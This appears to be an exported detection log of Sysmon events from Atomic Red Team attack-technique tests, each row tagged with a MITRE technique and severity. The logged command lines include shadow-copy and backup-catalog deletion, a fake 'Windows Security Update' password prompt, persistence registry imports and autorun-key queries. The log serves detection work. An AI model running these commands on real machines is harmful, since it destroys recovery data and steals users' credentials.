747F3D96-D812-5D31-0000-0010AC892B00 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966704 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:18:42.516 + 365ABB72-78D2-5C91-0000-0010D8A50200 + 2572 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-77C4-5C91-0000-0020AD7D0100 + 0x17dad + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-785E-5C91-0000-00103FEA0100 + 1928 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3641 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:45.569 + 747F3D96-D811-5D31-0000-001000632B00 + 4500 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3640 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:40.849 + 747F3D96-D80C-5D31-0000-001005542B00 + 1348 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3638 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:40.568 + 747F3D96-D80C-5D31-0000-0010223C2B00 + 6896 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3637 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:37.170 + 747F3D96-D809-5D31-0000-001072292B00 + 980 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3633 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:37.083 + 747F3D96-D809-5D31-0000-00100A242B00 + 3968 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3631 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.935 + 747F3D96-D7DB-5D31-0000-0010B5A82A00 + 4452 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3631 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.935 + 747F3D96-D7DB-5D31-0000-0010B5A82A00 + 4452 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3630 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:51.871 + 747F3D96-D7DB-5D31-0000-001089A52A00 + 4256 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3617 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:46:19.023 + 747F3D96-D7BB-5D31-0000-0010E7FE2900 + 2056 + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe + 4.7.3190.0 built by: NET472REL1LAST_C + Visual C# Command Line Compiler + Microsoft® .NET Framework + Microsoft Corporation + "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3616 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:56.040 + 747F3D96-D7A4-5D31-0000-001020C62900 + 4080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3695 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.710 + 747F3D96-D87C-5D31-0000-0010CA5B3100 + 956 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3693 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.629 + 747F3D96-D87C-5D31-0000-00103F573100 + 2440 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3691 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.541 + 747F3D96-D87C-5D31-0000-0010B4523100 + 4016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3689 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.447 + 747F3D96-D87C-5D31-0000-0010264E3100 + 1428 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3687 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.377 + 747F3D96-D87C-5D31-0000-001097493100 + 1680 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3685 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.284 + 747F3D96-D87C-5D31-0000-001009453100 + 5016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3683 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.212 + 747F3D96-D87C-5D31-0000-00107A403100 + 5984 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3681 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.135 + 747F3D96-D87C-5D31-0000-0010E83B3100 + 2888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3680 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:31.675 + 747F3D96-D87B-5D31-0000-0010D92D3100 + 3188 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + 